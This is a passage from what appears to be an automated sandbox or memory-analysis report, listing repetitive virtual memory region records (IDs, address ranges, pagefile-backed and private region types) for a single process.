0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3524 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3525 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3526 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3527 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3528 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3529 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3530 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3531 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3532 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3533 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3534 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3535 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3536 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3537 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3538 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3539 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3540 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3541 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3542 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3543 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3544 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3545 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3546 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3547 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3548 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3549 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3550 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3551 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3552 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3553 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3554 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: 
id = 3555 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3556 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3557 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3558 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3559 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3560 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3561 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3562 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3563 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3564 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3565 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3566 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3567 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 3568 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3569 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3570 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3571 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3572 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3573 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3574 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3575 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3576 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3577 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3578 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3579 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3580 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3581 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3582 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3583 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3584 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3585 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3586 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3587 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3588 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3589 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3590 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3591 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3592 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3593 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3594 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3595 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3596 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3597 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3598 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3599 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3600 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3601 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3707 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3708 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3709 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3710 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3711 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3712 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3713 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3714 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3715 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3716 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3717 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3718 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3719 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3720 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3721 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3722 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3723 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3724 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3725 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3726 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3727 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3728 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3729 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3730 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3731 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3732 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3733 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3734 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3735 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3736 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3737 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3738 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3739 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3740 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3741 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3742 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3743 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3744 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3745 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3746 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3747 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3748 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3749 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3750 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3751 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3752 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3753 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3754 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3755 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3756 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3757 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3758 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3759 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3760 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3761 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3762 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: 
id = 3763 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3764 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3765 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3766 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3767 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3768 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3769 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3770 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3771 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3772 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3773 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3774 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3775 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 3776 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3777 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3778 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3779 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3780 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3781 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3782 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3783 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3784 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3785 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3786 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3787 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3788 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3789 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3790 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3791 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3792 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3793 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3794 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3795 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3796 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3797 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3798 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3799 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3800 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3801 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3802 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3803 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3804 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3805 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3806 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3807 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3808 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3809 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3810 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3811 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3812 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3918 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3919 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3920 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3921 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3922 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3923 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3924 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3925 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3926 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3927 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3928 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3929 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3930 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3931 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3932 start_va = 0x2a0000 end_va = 0x2affff 
